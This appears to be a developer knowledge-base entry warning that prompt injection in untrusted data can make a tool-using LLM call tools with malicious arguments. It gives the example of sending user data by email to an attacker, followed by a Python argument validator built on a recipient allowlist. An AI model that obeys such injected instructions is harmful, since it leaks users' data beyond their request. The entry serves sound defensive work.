Report #83323
[gotcha] Malicious tool arguments generated from untrusted LLM context
Validate and sanitize all arguments generated by the LLM before passing them to tool implementations. Never trust that the LLM will only generate safe arguments based on the user's intent.
Journey Context:
When LLMs are given tool-use capabilities, developers often assume the LLM will map user intent to safe function arguments. An attacker can inject instructions into untrusted data that cause the LLM to call a function with malicious arguments (e.g., send_email(to='[email protected]', body=user_data)). The LLM is just predicting the next token; it doesn't 'know' the difference between a legitimate user request and an injected instruction to call a tool. Application-level validation is the only reliable defense.
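As a minimal sketch of what application-level validation could look like for the send_email example above: the validator name, the exception type, the recipient allowlist, and the size limit below are all hypothetical and chosen for illustration; only the send_email tool name and its to/body arguments come from this report. It assumes the LLM's tool call has already been parsed into a plain dict.

```python
from dataclasses import dataclass

# Hypothetical policy values; a real application would load these from config.
ALLOWED_RECIPIENT_DOMAINS = {"example.com"}
MAX_BODY_CHARS = 2000


class ToolArgumentError(ValueError):
    """Raised when LLM-generated tool arguments fail validation."""


@dataclass(frozen=True)
class SendEmailArgs:
    to: str
    body: str


def validate_send_email_args(raw: dict) -> SendEmailArgs:
    """Check LLM-produced arguments before the real send_email tool runs."""
    # Reject missing or unexpected argument names instead of ignoring them.
    if set(raw) != {"to", "body"}:
        raise ToolArgumentError("expected exactly the arguments 'to' and 'body'")

    to, body = raw["to"], raw["body"]
    if not isinstance(to, str) or not isinstance(body, str):
        raise ToolArgumentError("'to' and 'body' must be strings")

    # Refuse address lists, display-name syntax, and header-injection characters.
    if any(ch in to for ch in ",;<> \t\r\n"):
        raise ToolArgumentError("recipient must be a single bare address")

    # Require exactly one '@' and a domain that is on the allowlist.
    local, sep, domain = to.rpartition("@")
    if not sep or not local or "@" in local:
        raise ToolArgumentError("recipient is not a valid address")
    if domain.lower() not in ALLOWED_RECIPIENT_DOMAINS:
        raise ToolArgumentError("recipient domain is not on the allowlist")

    if len(body) > MAX_BODY_CHARS:
        raise ToolArgumentError("body exceeds the size limit")

    return SendEmailArgs(to=to, body=body)
```

The idea is that the tool dispatcher calls the validator first and runs the tool only if it returns; on ToolArgumentError the call is refused and logged rather than executed. An allowlist is used here instead of a blocklist because the set of acceptable recipients is usually small and known, while the set of malicious ones is not.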
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-21T22:26:38.902001+00:00— report_created — created